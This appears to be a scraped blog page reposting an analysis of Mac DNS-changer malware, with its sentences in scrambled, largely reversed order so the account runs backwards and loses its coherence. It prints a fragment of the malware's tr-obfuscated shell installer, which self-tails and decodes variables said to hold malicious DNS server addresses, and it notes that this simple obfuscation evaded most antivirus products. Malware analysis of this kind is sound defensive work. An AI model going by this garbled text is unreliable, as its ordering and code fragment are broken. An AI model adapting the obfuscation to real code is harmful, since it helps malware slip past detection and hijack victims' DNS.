These can be easily deobfuscated manually: Second 2 tr commands are used to deobfuscate the s1 and s2 variables, which will contain the IP addresses of the DNS servers. In other words, they take the file, count the lines, subtract 2 from the line number, tail the rest and pass it through the first tr command, and redirect the output to 1. PSID=$( (/voj/obpf/olvxpi | tjkd PjphajcSkjsplk | okq -k 'o/.*PjphajcSkjsplk : //')<< EOF Upxmfqrzibdanwgkethlcyosv>1 s1=cx. s2=cx. X=`cat "$0" |wc -l|awk ''` x=`expr $x - 2` tail -$x "$0" |tr vdehrujzpbqafwtgkxyilcnos The deobfuscation is really simple: the new sample looks like this: Signature detection failure I would say … The obfuscation is very, very simple (they only use the tr command) but, unfortunately, it was enough to fool almost *all* anti-virus programs – according to VirusTotal, this new sample was detected by only 2 (!!) AV programs. However, one thing I noticed was that the attackers started obfuscating the installation code. I quickly analyzed it and the sample does exactly the same thing as the one from September – it changes the DNS servers and reports to a C&C server. One of our readers, Matt, submitted a new sample today. This improved a bit over the time, so when I tested the sample again today on VirusTotal, 10 anti-virus programs detected it. Only couple of anti-virus programs detected the original sample (a DMG file). The anti-virus coverage was especially disappointing. it did not exploit any vulnerabilities, but was based on social engineering), the way it was packed showed that the attackers meant real business.Īll the malware did was change local DNS servers to couple of servers in a known bad network, and tell the command and control server that a new victim is ready. While the malware itself was not anything spectacular (i.e. The main idea about this was to let Mac users aware that the bad guys are not ignoring this platform any more. Back in November last year we published a diary about Mac DNS changer malware ( ).
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |